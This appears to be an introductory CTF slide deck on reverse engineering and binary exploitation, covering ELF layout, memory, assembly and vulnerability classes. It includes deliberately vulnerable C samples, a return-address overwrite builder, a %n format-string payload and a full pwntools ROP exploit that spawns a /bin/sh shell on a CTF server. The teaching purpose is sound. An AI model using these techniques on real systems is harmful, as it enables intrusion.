Reverse Engineering & Exploitation (pwn) - 101

Who Am I?

Graduated from UMD in '19 with a BS in CS. Involved in CSEC and helped create challenges for UMDCTF-2018/19.

 

Now I have to be an adult and work my life away, but I still love CTFs and connecting with the community! (And I love my job! #cyberroolz)

Mike - WittsEnd2

Software Engineer - C, Python, & Web

Reverse Engineer

Graduate Student - M. Eng. Cyber Sec.

Hobbies: CTFs/Dev Projects, Entrepreneurship, Baseball, Music, Stocks

 

How to Reach Me

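#include <stdio.h>
#include <stdlib.h>

typedef struct Contact {
    char discord[32]; // <- best way to contact me
    char twitter[32];
    char github[32];
} Contact;

Contact *shareContact(void) {
    Contact *contactInfo = malloc(sizeof(Contact));
    if (contactInfo == NULL)
        return NULL;
    // Arrays are not assignable in C, so copy the strings into them.
    snprintf(contactInfo->discord, sizeof contactInfo->discord, "WittsEnd2#9274");
    snprintf(contactInfo->twitter, sizeof contactInfo->twitter, "@RagnarSecurity");
    snprintf(contactInfo->github, sizeof contactInfo->github, "WittsEnd2");
    return contactInfo; // the caller is responsible for free()
}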

Agenda

- Define Reverse Engineering and Exploitation (pwn) 

- Understanding How Files Are Compiled

- Memory

- Analysis and Assembly

- Vulnerabilities 

- Additional Tools

What the F*** is pwn and Reverse Engineering? 

Definition 1: It's Magic

Reverse Engineering

A process of extracting knowledge from engineered artifacts.

Binary Exploitation

Binary exploitation is the process of subverting a compiled application such that it violates some trust boundary in a way that is advantageous to the attacker.

The Header

The header contains the blueprint to the program you are analyzing!

Layout of a Compiled ELF File

Contains data about linking and execution

An array of entries, where each entry describes a segment or other information about the file

Segments contain either code or data, related to the program's execution.

The section header table has all of the information necessary to locate and isolate each of the file's sections.

ELF Header

#define EI_NIDENT 16

typedef struct {
        unsigned char e_ident[EI_NIDENT];
        Elf32_Half    e_type;
        Elf32_Half    e_machine;
        Elf32_Word    e_version;
        Elf32_Addr    e_entry;
        Elf32_Off     e_phoff;
        Elf32_Off     e_shoff;
        Elf32_Word    e_flags;
        Elf32_Half    e_ehsize;
        Elf32_Half    e_phentsize;
        Elf32_Half    e_phnum;
        Elf32_Half    e_shentsize;
        Elf32_Half    e_shnum;
        Elf32_Half    e_shstrndx;
} Elf32_Ehdr;

$ readelf -h a.out       ### Output modified slightly
  Magic:   7f 45 4c 46               \x7fELF
  Class:                             ELF32
  Data:                              little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048430
  Start of program headers:          52 
  Start of section headers:          8588 
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         9
  Size of section headers:           40 (bytes)
  Number of section headers:         35
  Section header string table index: 34

e_ -- elf

ph -- program header

sh -- section header

off -- offset

ent -- entry
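
To make the struct and the readelf output line up, here is a minimal sketch that unpacks an Elf32_Ehdr with Python's struct module. The sample bytes are hypothetical: they are packed from the readelf values shown above, not read from a real a.out, and the sketch only handles 32-bit little-endian files.

```python
import struct

# Elf32_Ehdr layout: 16-byte e_ident, then Half = H (2 bytes), Word/Addr/Off = I (4 bytes)
ELF32_EHDR = struct.Struct("<16sHHIIIIIHHHHHH")
FIELDS = ("e_ident", "e_type", "e_machine", "e_version", "e_entry", "e_phoff",
          "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
          "e_shentsize", "e_shnum", "e_shstrndx")

def parse_elf32_header(data):
    """Return the ELF header fields as a dict (32-bit little-endian only)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("this sketch only handles ELF32, little endian")
    return dict(zip(FIELDS, ELF32_EHDR.unpack_from(data)))

# Hypothetical header rebuilt from the readelf output (type EXEC = 2, Intel 80386 = 3)
sample = ELF32_EHDR.pack(b"\x7fELF\x01\x01\x01" + b"\x00" * 9,
                         2, 3, 1, 0x8048430, 52, 8588, 0, 52, 32, 9, 40, 35, 34)
header = parse_elf32_header(sample)
print(hex(header["e_entry"]), header["e_phnum"], header["e_shnum"])
```

To try it on a real binary, pass the first 52 bytes of the file instead of sample.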

Section Header

TRY: 

$ readelf -S /bin/bash

### modified output 
  [Nr] Name              Type      
  [ 0]                   NULL      
  [ 1] .interp           PROGBITS  
  [ 2] .note.ABI-tag     NOTE      
  [ 3] .note.gnu.build-i NOTE      
  [ 4] .gnu.hash         GNU_HASH  
  [ 5] .dynsym           DYNSYM    
  [ 6] .dynstr           STRTAB    
  [ 7] .gnu.version      VERSYM    
  [ 8] .gnu.version_r    VERNEED   
  [ 9] .rela.dyn         RELA      
  [10] .rela.plt         RELA      
  [11] .init             PROGBITS  
  [12] .plt              PROGBITS  
  [13] .plt.got          PROGBITS  
  [14] .text             PROGBITS  
  [15] .fini             PROGBITS  
  [16] .rodata           PROGBITS  
  [17] .eh_frame_hdr     PROGBITS  
  [18] .eh_frame         PROGBITS  
  [19] .init_array       INIT_ARRAY
  [20] .fini_array       FINI_ARRAY
  [21] .data.rel.ro      PROGBITS  
  [22] .dynamic          DYNAMIC   
  [23] .got              PROGBITS  
  [24] .data             PROGBITS  
  [25] .bss              NOBITS    
  [26] .gnu_debuglink    PROGBITS  
  [27] .shstrtab         STRTAB 

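What is a section header?

A well-defined header that gives information about a section of the binary, which is itself unstructured.

What are some sections that are useful to us?

    .text (executable code)

    .got (Global Offset Table: addresses of dynamically linked functions and variables)

    .data (initialized global and static variables)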

Program Header

Program headers indicate how the segments required for execution are to be loaded into virtual memory.

There is a section-to-segment mapping that specifies which sections are part of which segments.

Most disassemblers recreate this layout and do all of their analysis based on virtual addressing.

More ELF File Info:

https://slides.com/drakemp/hacs408e-elf

More PE File Info:

https://slides.com/drakemp/hacs408e-pe

Memory

Paging

Organizes memory (or disk) into chunks

Typically between 512 bytes and 8192 bytes

Page Table

Groups pages together

A page that contains pointers to pages

 

How Addresses Are Built

[Page Pointer][Intermediate][Offset]
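
As a rough illustration of the layout above, this sketch splits a 32-bit virtual address into its three parts. The field widths are an assumption: classic two-level x86 paging with 4 KiB pages (10-bit directory index, 10-bit table index, 12-bit offset). Other architectures and page sizes use different widths.

```python
PAGE_OFFSET_BITS = 12   # assumed: 4 KiB pages
TABLE_INDEX_BITS = 10   # assumed: 1024 entries per page table

def split_virtual_address(addr):
    """Split a 32-bit address into (directory index, table index, offset)."""
    offset = addr & ((1 << PAGE_OFFSET_BITS) - 1)
    table_index = (addr >> PAGE_OFFSET_BITS) & ((1 << TABLE_INDEX_BITS) - 1)
    directory_index = addr >> (PAGE_OFFSET_BITS + TABLE_INDEX_BITS)
    return directory_index, table_index, offset

# The entry point from the readelf example
directory_index, table_index, offset = split_virtual_address(0x08048430)
print(directory_index, table_index, hex(offset))
```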

 

Paging Algorithms

  • First-in First-out (FIFO)
    • Performs poorly in practical applications
    • Many variations, e.g. second chance
  • Least Recently Used (LRU)
    • Tracks page usage over a short period of time
    • Near optimal performance… in theory
    • Can be expensive to implement
  • Random
    • Performs better than FIFO!
    • Fallback algorithm when LRU degrades
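
A small simulation can make the FIFO and LRU comparison concrete. This is only a sketch that counts page faults for a made-up reference string; real kernels use approximations of these policies, and the function names here are illustrative.

```python
from collections import OrderedDict, deque

def fifo_faults(refs, frames):
    """Count page faults when the oldest loaded page is evicted first."""
    resident, order, faults = set(), deque(), 0
    for page in refs:
        if page in resident:
            continue
        faults += 1
        if len(resident) == frames:
            resident.discard(order.popleft())
        resident.add(page)
        order.append(page)
    return faults

def lru_faults(refs, frames):
    """Count page faults when the least recently used page is evicted first."""
    resident, faults = OrderedDict(), 0
    for page in refs:
        if page in resident:
            resident.move_to_end(page)   # mark as most recently used
            continue
        faults += 1
        if len(resident) == frames:
            resident.popitem(last=False)  # drop the least recently used page
        resident[page] = True
    return faults

refs = [1, 2, 3, 4, 1, 2, 5, 1, 2, 3, 4, 5]
for frames in (3, 4):
    print(frames, fifo_faults(refs, frames), lru_faults(refs, frames))
```

With this reference string FIFO gets worse when it is given a fourth frame (Belady's anomaly), while LRU improves.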

Memory Layout - 32 Bit

Primary places we work with memory are...

  • Stack
  • Heap

BSS Section

Uninitialized Static and Global Variables

Data Section

Initialized Static and Global Variables

The Stack - 32 bit

We are assuming integers and Intel Architecture in this example

Param 3

Param 2

Param 1

Local Var 1

Local Var 2

Local Var 3

Data Structures

Stack frame, from high addresses to low:

param1

ret

ebp

int var 1

int arr[3]

int arr[2]

int arr[1]

int arr[0]

Important Things To Know

  • Size of Types of Data (int, float, etc.) 
  • Pointers
  • Structs & Linked List
  • Arrays
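
One way to poke at these ideas without writing C is Python's ctypes module. The sketch below prints type sizes for the machine it runs on, reads an array element through pointer arithmetic, and declares a linked-list node. The Node struct is a made-up example, and the sizes depend on your platform.

```python
import ctypes

class Node(ctypes.Structure):
    """Hypothetical linked-list node: struct Node { int value; struct Node *next; }"""

Node._fields_ = [("value", ctypes.c_int), ("next", ctypes.POINTER(Node))]

sizes = {
    "char": ctypes.sizeof(ctypes.c_char),
    "int": ctypes.sizeof(ctypes.c_int),
    "float": ctypes.sizeof(ctypes.c_float),
    "double": ctypes.sizeof(ctypes.c_double),
    "pointer": ctypes.sizeof(ctypes.c_void_p),
}

# arr[2] lives at base + 2 * sizeof(int), exactly like in C
arr = (ctypes.c_int * 4)(10, 20, 30, 40)
base = ctypes.addressof(arr)
third = ctypes.c_int.from_address(base + 2 * ctypes.sizeof(ctypes.c_int)).value

print(sizes, third, Node.next.offset, ctypes.sizeof(Node))
```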

Register

  • The processor's "memory"
  • Data that is extremely fast to access
  • Doesn't hold a lot of data
  • Can access portions of registers too
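
The last bullet can be sketched with bit masks. This models how x86 exposes AX, AH, and AL as views into EAX. It is plain integer arithmetic, not real register access.

```python
def sub_registers(eax):
    """Return the x86 sub-register views of a 32-bit EAX value."""
    eax &= 0xFFFFFFFF
    return {
        "EAX": eax,               # all 32 bits
        "AX": eax & 0xFFFF,       # low 16 bits
        "AH": (eax >> 8) & 0xFF,  # bits 8-15
        "AL": eax & 0xFF,         # low 8 bits
    }

views = sub_registers(0x12345678)
print({name: hex(value) for name, value in views.items()})
```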

Static And Dynamic Analysis

Static

Learning how programs behave without running the executable.

 

  • Lots of assembly.
  • Requires disassembler.
  • The "cool" way of reversing.
  • Should be last resort (unless you have source code). 

Dynamic

Learning how programs behave by running the executable. 

  • Use of debuggers and tools like strace/ltrace.
  • Can help pinpoint errors and spots for further analysis. 
  • Helpful to have knowledge of static analysis to complement it.

Assembly

Machine Code That Is Human Readable

  • Required to do RE
  • Many architectures (x86, ARM)
  • Two primary syntaxes: Intel and AT&T
    • Intel: inst dest, src1, src2, ...
    • AT&T: inst src1, src2, ..., dest

Processor manuals are your friend!

PUSH       EBP
MOV        EBP,ESP
AND        ESP,0xfffffff0
SUB        ESP,0x20
CMP        dword ptr [EBP + param_1],0x2
JLE        LAB_0804852c
MOV        EAX,dword ptr [EBP + param_2]
ADD        EAX,0x4
MOV        EAX,dword ptr [EAX]
MOV        dword ptr [ESP]=>local_30,EAX
CALL       atoi                          ; int atoi(char * __nptr)
MOV        dword ptr [ESP + local_18],EAX
MOVSX      ECX,AX
MOV        EDX,dword ptr [ESP + local_18]
MOV        EAX,dword ptr [ESP + local_14]
MOV        dword ptr [ESP + local_24],ECX
MOV        dword ptr [ESP + local_28],EDX
MOV        dword ptr [ESP + local_2c],EAX
MOV        dword ptr [ESP]=>local_30,s_%d_*_%d_==_%d_0804   = "%d * %d == %d\n"
CALL       printf                                           int printf(char * __format, ...)
JMP        LAB_0804859c

                         LAB_08048590                                     
MOV        dword ptr [ESP]=>local_30,s_Something_went_hor   = "Something went horribly wrong"
CALL       puts                                             int puts(char * __s)

                         LAB_0804859c                                      
MOV        EAX,0x0

                         LAB_080485a1                                    
LEAVE
RET

Exploitation (pwn)

Buffer Overflow

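  • Overwriting memory to get the desired execution.
  • Caused by unbounded writes into a fixed-size buffer
    • gets (no length limit at all)
    • printf-family writers such as sprintf (no bound on the destination buffer)
    • fgets (only when the size passed is larger than the buffer)
  • Can be either stack or heap based - How are they different?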

Input

#include <stdio.h>

int main() {
    char buff[12];
    gets(buff); // vulnerable: gets() never checks the length of buff
    return 0;
}

Overwrite the original return address so that it points to either shellcode or another address in the program.
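
A minimal sketch of what such an input looks like for a 32-bit target: filler bytes up to the saved return address, followed by the new address in little-endian order. The offset of 24 and the target address are hypothetical; the real offset depends on the compiler and stack layout, and is usually found with a debugger.

```python
import struct

def build_payload(offset_to_ret, new_return_address):
    """Pad up to the saved return address, then overwrite it (32-bit little endian)."""
    padding = b"A" * offset_to_ret
    return padding + struct.pack("<I", new_return_address)

# Hypothetical values for illustration only
payload = build_payload(24, 0x08048430)
print(payload)
```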

Format String

  • Occurs when the submitted data of an input string is evaluated as a command by the application.
  • Read the stack via common format specifiers (e.g. %x, %s, %p)
  • Write to memory using %n
    • Stores the number of bytes written so far into the int that the matching int* argument points to

#include <stdio.h>

int main(int argc, char **argv)
{
	if (argc < 2)
		return 1;

	// This line is safe: the input is only ever treated as data
	printf("%s\n", argv[1]);

	// This line is vulnerable: the input is used as the format string
	printf(argv[1]);

	return 0;
}

Let's say our payload is ABCDABCD %p.%p.%261$p.%4n. This will perform the write *0x44434241 = 35.

 

Why is that?
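
Part of the answer is byte order: the characters "ABCD" sitting on the stack are read back as a little-endian pointer. The sketch below shows that conversion and builds a tiny %n payload. The target address 0x0804a010 and the argument index 4 are hypothetical; the index depends on where the buffer sits relative to printf's arguments.

```python
import struct

def address_from_payload(payload):
    """Interpret the first four payload bytes as a 32-bit little-endian pointer."""
    return struct.unpack_from("<I", payload)[0]

def format_write_payload(address, arg_index):
    """Place an address at the start of the buffer, then point %n at it."""
    return struct.pack("<I", address) + f"%{arg_index}$n".encode()

print(hex(address_from_payload(b"ABCDABCD")))
# Hypothetical target: printf emits the 4 address bytes, so %n would store 4 there
print(format_write_payload(0x0804A010, 4))
```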

Timing Attacks

  • Based on either delays or inconsistencies in execution time.
  • If we know how long it takes for the thing we want to execute, we can use that to attack the software.

#include <stdbool.h>
#include <stddef.h>

bool insecureStringCompare(const void *a, const void *b, size_t length) {
  const char *ca = a, *cb = b;
  for (size_t i = 0; i < length; i++)
    if (ca[i] != cb[i])
      return false;
  return true;
}

bool constantTimeStringCompare(const void *a, const void *b, size_t length) {
  const char *ca = a, *cb = b;
  bool result = true;
  for (size_t i = 0; i < length; i++)
    result &= ca[i] == cb[i];
  return result;
}

Which is vulnerable? 
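
To see what the early exit leaks, this sketch counts how many bytes an early-exit comparison examines before it gives up. The helper name and the sample strings are made up. For real code, Python's standard library offers hmac.compare_digest as a comparison designed to resist this kind of timing analysis.

```python
import hmac

def insecure_compare_steps(a, b):
    """Early-exit comparison that also reports how many bytes it looked at."""
    steps = 0
    for x, y in zip(a, b):
        steps += 1
        if x != y:
            return False, steps
    return len(a) == len(b), steps

secret = b"secret"
# The more leading bytes a guess gets right, the more work is done before returning
print(insecure_compare_steps(secret, b"sXXXXX"))
print(insecure_compare_steps(secret, b"secXXX"))
print(hmac.compare_digest(secret, b"secret"))
```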

Linking Attacks

What is linking?

  • Linking lets a program call code that lives outside the binary, such as shared libraries.
  • Dynamic linking reduces the size of the program and its compilation time.
  • Linux: .so
  • Windows: .dll

Common Linked Functions:

  • printf 
  • puts
  • atoi
  • etc...

Linking Attacks

We redefine what the binary's link refers to so that we can trick it into executing what we want!

Essentially, we insert malicious code where valid code should be.
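
A toy model of the idea, assuming the link is resolved through a lookup table such as the .got section mentioned earlier. Here the table is just a Python dict and the functions are stand-ins; nothing in this sketch touches a real binary.

```python
def real_puts(text):
    return f"puts: {text}"

def attacker_code(text):
    return "attacker code ran instead"

# Toy stand-in for the Global Offset Table: symbol name -> code to run
got = {"puts": real_puts}

def call_via_got(name, arg):
    """The program never calls puts directly; it looks the target up first."""
    return got[name](arg)

before = call_via_got("puts", "hello")
got["puts"] = attacker_code   # the attacker overwrites the table entry
after = call_via_got("puts", "hello")
print(before, "|", after)
```

The call site is unchanged. Only the table entry moved, which is why writable link tables are an attractive target.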

Tools

Debuggers

  • Allow you to step through programs and understand how they work
  • Great for verifying that an exploit works
  • Linux - Use GDB
    • Extensions designed for exploitation (GEF, PEDA)
  • Windows - Use WinDBG

Disassemblers

  • IDA Pro
  • Ghidra
  • Binary Ninja
  • Radare2
  • Cutter

Translates machine code to assembly (or even C code). 

pwntools

  • Framework to make exploitation easier
  • Commonly used for CTF challenges
  • ROP Chain Builder (no need to look for gadgets).
  • Format String Builder


http://docs.pwntools.com/en/stable/


from pwn import *

context(os='linux', arch='amd64')

# p = process('./return-to-what')   # local testing
p = remote('chal.duc.tf', 30003)
binary = ELF('./return-to-what')
rop = ROP(binary)
libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')

junk = b'A' * 56   # padding up to the saved return address

# Stage 1: call puts(puts@got) to leak a libc address, then return to vuln()
rop.puts(binary.got['puts'])
rop.call(binary.symbols['vuln'])

log.info("Stage 1 ROP chain:\n" + rop.dump())

stage1 = junk + rop.chain()

p.recvuntil(b'Where would you like to return to?')
p.sendline(stage1)
p.recvline()

# The leak is a raw little-endian address; pad it to 8 bytes before unpacking
leaked_puts = u64(p.recvline()[:8].strip().ljust(8, b'\x00'))
log.success("Leaked puts@GLIBC: " + hex(leaked_puts))

# Rebase libc so that its symbols resolve to runtime addresses
libc.address = leaked_puts - libc.symbols['puts']

# Stage 2: call system("/bin/sh") inside the rebased libc
rop2 = ROP(libc)
rop2.system(next(libc.search(b'/bin/sh\x00')), 0, 0)

# rop2 = ROP(binary)
# rop2.call(libc.symbols['system'], (next(libc.search(b'/bin/sh\x00')), ))

log.info("Stage 2 ROP chain:\n" + rop2.dump())
stage2 = junk + rop2.chain()
p.recvuntil(b'Where would you like to return to?')
p.sendline(stage2)
p.recvline()
p.interactive()

The Giant List of Other Tools

  • strace
  • ltrace
  • UPX
  • WinDBG
  • GDB
  • PEDA
  • GEF
  • OllyDbg
  • PEView
  • readpe
  • readelf
  • Wireshark
  • IDA
  • Binary Ninja
  • Cutter
  • Radare2
  • Ghidra
  • angr
  • capstone

Practice Problems

https://github.com/Ragnar-Security/Practice-Problems

Learn More

http://security.cs.rpi.edu/courses/binexp-spring2015/

https://slides.com/drakemp

https://slides.com/ragnarsecurity (will post more)

 

Do some CTFs

Works Cited

https://slides.com/drakemp

Allen Hazelton - ENPM696

Dharmalingam Ganesan - ENPM691 (Linking)

How To Pwn/Rev 101

By Ragnar Security
